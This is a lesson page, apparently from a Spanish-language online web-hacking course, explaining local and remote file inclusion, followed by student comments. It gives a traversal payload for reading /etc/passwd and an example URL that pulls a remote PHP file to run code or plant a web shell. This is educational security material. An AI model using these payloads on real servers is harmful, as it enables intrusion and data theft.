Seria muy genial, un curso dedicado a este tipo de vulnerabilidades a detalle, me ha parecido muy curioso y sorprendente toda ñla información que hay en esta clase, no sabia nada de este tema y me ha gustado.
Introducción al Hacking de Aplicaciones Web
Bienvenida al Mundo del Hacking de Aplicaciones Web
Herramientas Básicas para Aprender Hacking
OWASP: Top 10 y Testing Guide
Burpsuite: Análisis de Solicitudes HTTP
HTTP: Métodos y Códigos de Status
Cabeceras HTTP y Cookies
Tipos de Aplicaciones Web y Análisis de sus Tecnologías
Técnicas de Hacking de Aplicaciones Web
Defacement: Vulnerabilidad en File Upload
Técnicas de File Inclusion: Local y Remote
Full Path Disclosure y Directory Traversal
Command Injection
SQL Injection Manual
SQL Injection Automatizada con SQLMap
Despedida
Continúa Aprendiendo de Hacking de Aplicaciones Web
No tienes acceso a esta clase
¡Continúa aprendiendo! Únete y comienza a potenciar tu carrera
La inclusión de archivos es una vulnerabilidad crítica en la seguridad de las aplicaciones web. Cuando no se manejan adecuadamente los parámetros de entrada, se pueden cargar archivos no deseados en el servidor. Existen dos tipos principales: Local File Inclusion (LFI) y Remote File Inclusion (RFI).
El LFI permite a un atacante cargar archivos del propio servidor web. Esto se logra manipulando parámetros en la URL que especifican qué archivos cargar. En un entorno de prueba, podría estructurarse de la siguiente manera:
?page=include.php
Al modificar este parámetro, podrías intentar cargar archivos sensibles del sistema. Por ejemplo, al realizar una serie de movimientos en el directorio (utilizando ../
), podrías llegar a:
../../../../etc/passwd
Esto permitiría leer el archivo passwd
, que contiene información crítica sobre los usuarios del sistema.
A diferencia de LFI, el RFI carga archivos desde un servidor remoto. Esta vulnerabilidad es especialmente peligrosa, ya que permite al atacante introducir código adicional en la aplicación desde cualquier parte de internet. Por ejemplo, cargando un archivo desde un servidor FTP:
http://www.ejemplo.com/index.php?page=ftp://ip/direccion/archivo.php
Esto podría permitir la ejecución de código PHP malicioso si el servidor es vulnerable, facilitando acciones como la carga de una web shell.
LFI:
RFI:
Para mitigar los riesgos asociados con LFI y RFI, se deben seguir prácticas de codificación segura:
La inclusión de archivos es una perspectiva poderosa para transformar el conocimiento en acción. Continuar explorando y aprendiendo es vital para mantenerse al ritmo de las amenazas de seguridad modernas. Para aquellos interesados en profundizar más, hay recursos adicionales disponibles que proporcionan análisis detallados y estudios de caso sobre estas y otras vulnerabilidades.
Aportes 7
Preguntas 3
Seria muy genial, un curso dedicado a este tipo de vulnerabilidades a detalle, me ha parecido muy curioso y sorprendente toda ñla información que hay en esta clase, no sabia nada de este tema y me ha gustado.
me gustaría mucho que se pudieran hacer cursos más avanzados sobre Explotación que es la parte que casi nadie enseña solo se muestra la vulnerabilidad pero no a aplicarla en un pentest por ejemplo que seria un poco mi objetivo con estos cursos
sí, por supuesto que sería interesante tener cursos de ataques avanzados. De hecho, sería genial que platzi implementara sus propias máquinas como Hack The Boc o Try Hack Me, de esta manera las personas interesadas en cybersec, se decantarían por platzi sin más.
¿Quieres ver más aportes, preguntas y respuestas de la comunidad?